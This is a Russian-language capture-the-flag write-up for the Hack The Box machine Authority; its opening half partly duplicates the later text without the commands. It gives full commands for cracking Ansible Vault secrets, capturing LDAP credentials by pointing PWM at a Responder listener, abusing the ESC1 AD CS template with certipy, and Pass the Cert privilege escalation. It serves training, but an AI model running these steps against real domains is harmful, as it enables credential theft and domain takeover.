stihl не предоставил(а) никакой дополнительной информации.
В этом райтапе я покажу, как применять технику ESC1 ADCS для получения сертификата администратора и Pass the Cert для получения доступа к хосту. Также достанем учетные данные из Ansible и стриггерим подключение к своему серверу LDAP для перехвата учетных данных.
Нашей целью будет захват рута на тренировочной машине Authority с площадки Для просмотра ссылки Войдиили Зарегистрируйся. Уровень ее сложности — средний.
И начинаем сканирование портов.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция -A).
Так как Windows может не отвечать на пинг, исключим этот шаг из сканирования (опция -Pn).
Результат работы скрипта
Сканер нашел множество открытых портов, что характерно для серверов на Windows:
или Зарегистрируйся.
Проверка гостевой учетной записи
Доступ есть, проверим доступные для чтения общие ресурсы.
Общие ресурсы SMB
В списке значится интересный каталог Development, который мы можем просмотреть. Подключаем к шаре с помощью Для просмотра ссылки Войдиили Зарегистрируйся и смотрим содержимое.
Содержимое SMB-ресурса Development
Видим вложенный каталог. Спустившись по каталогам дальше, находим директорию Ansible, содержащую папки ADCS, LDAP, PWM и SHARE.
Вложенные каталоги
Содержимое файла main.yml
Все учетные данные зашифрованы одним ключом, который можно попытаться подобрать. Первым делом сохраним один из блоков в файл, который затем передадим скрипту Для просмотра ссылки Войдиили Зарегистрируйся для преобразования в формат hashcat/jtr.
Преобразование блока данных
Теперь определим тип хеша. Делать это удобно с помощью справки hashcat.
Справка hashcat
Теперь сохраняем хеш в файл и передаем его в hashcat вместе с полученным режимом 16900 (параметр -m) и списком паролей.
Результат перебора хеша
В итоге получаем ключ, которым можно расшифровать все пароли. Каждый сохраняем в отдельный файл и используем ansible-vault decrypt.
Получение паролей ansible-vault
Подключение к порту 8443
Получаем ошибку, которая сообщает о том, что обязателен TLS. Значит, меняем протокол с HTTP на HTTPS.
Главная страница сайта
Для авторизации нужен логин, которого у нас нет. Но если перейти к менеджеру настроек, то там требуется только сервисный пароль.
Менеджер настроек
Страница авторизованного пользователя
На этой странице можно сохранять или загружать настройки. Также отображается таблица состояния, в которой видим ошибку подключения к LDAP. Видимо, адрес сервера LDAP указан в настройках, и если мы сможем их изменить, то вызовем авторизацию на свой сервер. Причем пароли LDAP передаются в открытом виде.
Для просмотра ссылки Войдиили Зарегистрируйся
Находим адрес LDAP в скачанных настройках и переписываем значение на свой адрес.
Измененная конфигурация
Запускаем у себя многофункциональный листенер Для просмотра ссылки Войдиили Зарегистрируйся и загружаем измененный файл.
Логи Responder
В запросе есть как логин, так и пароль доменного пользователя svc_ldap. Для проверки учетных данных пробуем получить список пользователей с помощью CrackMapExec.
Пользователи домена
Пользователей мало, проверим, состоит ли наш в группе Remote Management Users.
Члены группы Remote Management Users
Таким образом, пользователь может получить управление через службу WinRM. Для подключения используем утилиту Для просмотра ссылки Войдиили Зарегистрируйся.
Флаг пользователя
Центры сертификации AD CS выдают сертификаты с параметрами, которые определяются шаблонами. Эти шаблоны представляют собой наборы политик регистрации и предопределенных параметров сертификата и содержат разные сведения, например:
Получить информацию о центре сертификации и проверить уязвимые шаблоны можно с помощью утилиты Для просмотра ссылки Войдиили Зарегистрируйся.
Информация из ADCS
Видим уязвимый шаблон сертификата CorpVPN. Этот сертификат уязвим к технике повышения привилегий ESC1:
Но так как получить сертификат может только компьютер, создаем подконтрольную учетную запись компьютера.
Создание учетной записи компьютера
Для работы Для просмотра ссылки Войдиили Зарегистрируйся нужно добавить в /etc/hosts записи для компьютера и центра сертификации.
А от имени созданного компьютера запросим сертификат для пользователя Administrator.
Получение сертификата администратора
Теперь нужно получить доступ к машине.
Ошибка получения TGT-билета
Certipy и PKINITtools используют PKINIT и получают TGT-билет, чтобы с помощью техники UnPac the hash извлечь NT-хеш учетной записи. Если вернуться к шаблону сертификата, можно увидеть, что он не имеет EKU Smart Card Logon, а значит, и не будет поддержки PKINIT! Тогда возьмем другую программу — Для просмотра ссылки Войдиили Зарегистрируйся. Она подключается к LDAP, используя аутентификацию Schannel. Но сперва разделим файл PFX на сертификат и ключ.
Извлечение сертификата и ключа
В PassTheCert есть очень удобная встроенная утилита для работы с LDAP — Для просмотра ссылки Войдиили Зарегистрируйся. Получив доступ к LDAP командой add_user_to_group, добавляем созданную учетную запись компьютера в группу администраторов.
Эксплуатация Pass the Cert через LDAP
А теперь подключаемся через WinRM и забираем флаг администратора.
Флаг рута
Машина захвачена!
Нашей целью будет захват рута на тренировочной машине Authority с площадки Для просмотра ссылки Войди
warning
Разведка
Сканирование портов
Добавляем IP-адрес машины в /etc/hosts:10.10.11.222 authority.htbИ начинаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
Код:
#!/bin/bash
ports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -A $1Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция -A).
Так как Windows может не отвечать на пинг, исключим этот шаг из сканирования (опция -Pn).
Сканер нашел множество открытых портов, что характерно для серверов на Windows:
- 53 — служба DNS;
- 80 (HTTP) — веб‑сервер Microsoft IIS/10.0;
- 88 — служба Kerberos;
- 135 — служба удаленного вызова процедур (Microsoft RPC);
- 139 — служба сеансов NetBIOS, NetLogon;
- 389 — служба LDAP;
- 445 — служба SMB;
- 464 — служба смены пароля Kerberos;
- 593 (HTTP-RPC-EPMAP) — используется в службах DCOM и MS Exchange;
- 636 — LDAP с шифрованием SSL или TLS;
- 5985 — служба удаленного управления WinRM;
- 8443 — веб‑сервер, выполняющий редирект на страницу /pwm;
- 9389 — веб‑службы AD DS.
Точка входа
Первым делом проверим доступ от имени гостевой учетной записи, для чего будем использовать фреймворк Для просмотра ссылки Войдиcrackmapexec smb 10.10.11.222 -u guest -p ""
Доступ есть, проверим доступные для чтения общие ресурсы.
crackmapexec smb 10.10.11.222 -u guest -p "" --sahres
В списке значится интересный каталог Development, который мы можем просмотреть. Подключаем к шаре с помощью Для просмотра ссылки Войди
Код:
impacket-smbclient guest@10.10.11.222
use Development
lsВидим вложенный каталог. Спустившись по каталогам дальше, находим директорию Ansible, содержащую папки ADCS, LDAP, PWM и SHARE.
Точка опоры
В каталоге PWM\defaults находим файл .yml, содержащий зашифрованные учетные данные.
Код:
get PWM\defaults\main.yml
cat main.ymlВсе учетные данные зашифрованы одним ключом, который можно попытаться подобрать. Первым делом сохраним один из блоков в файл, который затем передадим скрипту Для просмотра ссылки Войди
Теперь определим тип хеша. Делать это удобно с помощью справки hashcat.
hashcat --example | grep -A7 -B11 'ansible'
Теперь сохраняем хеш в файл и передаем его в hashcat вместе с полученным режимом 16900 (параметр -m) и списком паролей.
Код:
ansible2john ansible_hash2.txt > hash.txt
hashcat -m 16900 -a 0 --username hash.txt rockyou.txtВ итоге получаем ключ, которым можно расшифровать все пароли. Каждый сохраняем в отдельный файл и используем ansible-vault decrypt.
Код:
cat ansible_hash.txt | ansible-vault decrypt
cat ansible_hash2.txt | ansible-vault decrypt
cat ansible_hash3.txt | ansible-vault decryptПродвижение
С полученными учетными данными авторизоваться на службах не удалось. Но мы также получили креды для PWM на порте 8443.
Получаем ошибку, которая сообщает о том, что обязателен TLS. Значит, меняем протокол с HTTP на HTTPS.
Для авторизации нужен логин, которого у нас нет. Но если перейти к менеджеру настроек, то там требуется только сервисный пароль.
На этой странице можно сохранять или загружать настройки. Также отображается таблица состояния, в которой видим ошибку подключения к LDAP. Видимо, адрес сервера LDAP указан в настройках, и если мы сможем их изменить, то вызовем авторизацию на свой сервер. Причем пароли LDAP передаются в открытом виде.
Для просмотра ссылки Войди
Находим адрес LDAP в скачанных настройках и переписываем значение на свой адрес.
Запускаем у себя многофункциональный листенер Для просмотра ссылки Войди
sudo responder -I tun0 -v
В запросе есть как логин, так и пароль доменного пользователя svc_ldap. Для проверки учетных данных пробуем получить список пользователей с помощью CrackMapExec.
crackmapexec smb 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' --users
Пользователей мало, проверим, состоит ли наш в группе Remote Management Users.
crackmapexec smb 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!' --groups 'Remote Management Users'
Таким образом, пользователь может получить управление через службу WinRM. Для подключения используем утилиту Для просмотра ссылки Войди
evil-winrm -i 10.10.11.222 -u svc_ldap -p 'lDaP_1n_th3_cle4r!'
Локальное повышение привилегий
В общем каталоге также была директория ADCS. Службы сертификатов Active Directory (AD CS) — это настраиваемые службы для выдачи сертификатов и управления ими в системах безопасности ПО, использующих технологии открытых ключей.Центры сертификации AD CS выдают сертификаты с параметрами, которые определяются шаблонами. Эти шаблоны представляют собой наборы политик регистрации и предопределенных параметров сертификата и содержат разные сведения, например:
- срок действия сертификата;
- предназначение сертификата;
- способ указания субъекта;
- кому разрешено запросить сертификаты.
Получить информацию о центре сертификации и проверить уязвимые шаблоны можно с помощью утилиты Для просмотра ссылки Войди
.\Certify.exe find /vulnerable
Видим уязвимый шаблон сертификата CorpVPN. Этот сертификат уязвим к технике повышения привилегий ESC1:
- Enrollment Permissions показывает, что компьютеры домена могут запросить сертификат без утверждения менеджером;
- pKIExtendedKeyUsage показывает, что сертификат может использоваться для аутентификации в домене (Client Authentication);
- msPKI-Certificate-Name-Flag содержит флаг CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, говорящий о том, что шаблон сертификата позволяет запрашивающим лицам указывать имя объекта в CSR.
Но так как получить сертификат может только компьютер, создаем подконтрольную учетную запись компьютера.
impacket-addcomputer authority.htb/svc_ldap:'lDaP_1n_th3_cle4r!' -computer-name 'rcomp$' -computer-pass 'RRrr!!11'
Для работы Для просмотра ссылки Войди
10.10.11.222 authority.htb authority.authority.htb AUTHORITY-CAА от имени созданного компьютера запросим сертификат для пользователя Administrator.
certipy-ad req -u 'rcomp$' -p 'RRrr!!11' -ca AUTHORITY-CA -target authority.htb -template CorpVPN -upn [EMAIL]administrator@authority.htb[/EMAIL] -dns authority.authority.htb -dc-ip 10.10.11.222
Теперь нужно получить доступ к машине.
Pass the certificate
Pass the cert — это техника получения билета TGT, при которой для аутентификации используется сертификат пользователя вместо пароля. Обычно это можно провернуть в той же Certipy, но в данном случае получаем ошибку.certipy-ad auth -pfx administrator_authority.pfx -dc-ip 10.10.11.222
Certipy и PKINITtools используют PKINIT и получают TGT-билет, чтобы с помощью техники UnPac the hash извлечь NT-хеш учетной записи. Если вернуться к шаблону сертификата, можно увидеть, что он не имеет EKU Smart Card Logon, а значит, и не будет поддержки PKINIT! Тогда возьмем другую программу — Для просмотра ссылки Войди
Код:
certipy-ad cert -pfx administrator_authority.pfx -nokey -out administrator_authority.crt
certipy-ad cert -pfx administrator_authority.pfx -nocert -out administrator_authority.keyВ PassTheCert есть очень удобная встроенная утилита для работы с LDAP — Для просмотра ссылки Войди
python3 passthecert.py -action ldap-shell -crt administrator_authority.crt -key administrator_authority.key -domain authority.htb -dc-ip 10.10.11.222
А теперь подключаемся через WinRM и забираем флаг администратора.
evil-winrm -i 10.10.11.222 -u 'rcomp$' -p 'RRrr!!11'
Машина захвачена!